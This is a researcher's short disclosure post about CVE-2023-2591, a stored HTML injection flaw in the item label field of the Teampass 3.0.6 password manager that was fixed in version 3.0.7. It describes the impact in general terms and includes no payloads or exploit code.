I recently identified a security vulnerability in nilsteampassnet/teampass, a popular password management tool. This vulnerability, identified as CVE-2023-2591, is a stored HTML injection vulnerability in the item label field. If two users have the same folder access, malicious users can create an item where its label field is vulnerable to HTML injection. When other users see that item, it may force them to redirect to the attacker's website or capture their data using a form.
- Vulnerability Type: Stored HTML Injection
- CVE: CVE-2023-2591
- Software Version: Teampass 3.0.6
- Author: M Nadeem Qazi
Malicious users can exploit this vulnerability by creating an item with a vulnerable label field that allows HTML injection. When other users view the item, they may be redirected to the attacker's website or have their data captured through a form.
I reported this vulnerability to the nilsteampassnet/teampass team, and it was validated and fixed in version 3.0.7 with commit 57a977. The team also awarded me the disclosure bounty for my report.
The impact of this vulnerability could have been significant, as malicious actors could have exploited it to carry out HTML injection attacks, potentially redirecting other users to an attacker's website or capturing their sensitive data through a form. This could result in the theft of confidential information, financial loss, and reputational damage to the affected users or organizations. It could have also led to a wider breach of security, affecting other users who interact with the compromised item or website.
I want to stress the importance of regularly updating software and implementing secure coding practices to prevent such vulnerabilities. I hope my report will help raise awareness about the potential risks of such vulnerabilities and encourage users to take necessary precautions.
If you're interested in learning more about my findings, check out the report link on huntr.dev.
You can also follow me for updates on my research and other security-related topics:
- Instagram: @mnqazi
- Twitter: @mnqazi
- Facebook: @mnqazi
- LinkedIn: M_Nadeem_Qazi
Stay safe out there!